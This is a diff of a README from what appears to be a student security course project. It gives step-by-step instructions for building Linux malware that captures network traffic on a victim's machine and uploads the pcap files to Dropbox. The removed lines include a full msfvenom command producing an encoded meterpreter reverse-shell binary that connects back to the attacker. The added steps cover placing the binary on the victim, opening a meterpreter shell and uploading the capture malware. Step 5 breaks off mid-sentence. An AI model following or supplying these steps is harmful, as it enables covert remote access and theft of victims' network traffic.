rohitramkumar/CS460/README.md

 2. Create a Dropbox developer account, create an access token add it to your environment as "DROPBOX_ACCESS_TOKEN".
    Dropbox is used for storing pcap files that have been created on the victim's machine.

-3. Run ./build.sh to create the malware executable.
-The malware was only tested on Linux so it is advisable to only build it on Linux.

-4. Move into the directory containing all the Metasploit binaries.
-This is typically /opt/metasploit-framework/bin/.
-   Run the command below, which creates a binary version of an exploit that is placed on the victim's machine.
-   When this binary is executed, a meterpreter shell is started on your machine.
-More info on meterpreter shells can be found [here  (https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/)
+3. Run ./build.sh, which creates the malware executable, creates a binary version of an exploit that is placed on the victim's machine and starts a metasploit console instance.
+The script takes a single argument, which is your IP address.
+If you are on the same LAN as the victim, then the argument you give should be your private IP and if the victim is outside your network, you should give your public IP.
+When the exploit binary is executed, a meterpreter shell is started on your machine.
+More info on meterpreter shells can be found [here  (https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/) The malware was only tested on Linux so it is advisable to only build it on Linux.

-   ./msfvenom -a x86 --platform linux -p x86/linux/meterpreter/reverse_tcp LHOST=[YOUR_IP] LPORT=4444 -e x86/shikata_ga_nai -f elf -o virus

-   Make sure to fill [YOUR_IP] with your external IP address (router IP) if the victim's machine is outside your LAN and with your        internal IP address if you are in the same LAN as the victim.
-If you use your external IP address, then your router must have port forwarding enabled for port 4444.
+4. You must figure out a way to place the binary exploit onto the victim's machine.
+This project does not implement any Trojan Horse technique on it's own, so any method of placing the exploit on the victim's machine is fine.
+It is advisable to place the file under the user's directory of which you want to attack.

+5. For demonstration purposes, access the victim's machine and execute the exploit.
+On the attacking machine, a meterpreter shell should have started.
+Upload the malware executable onto the victim's machine using "upload [FILENAME]".
+Once the file is uploaded, start a bash shell on the victim machine with the command "

+6. Once you execute the malware, watch as packet data starts flowing into your Dropbox folder associated with the project.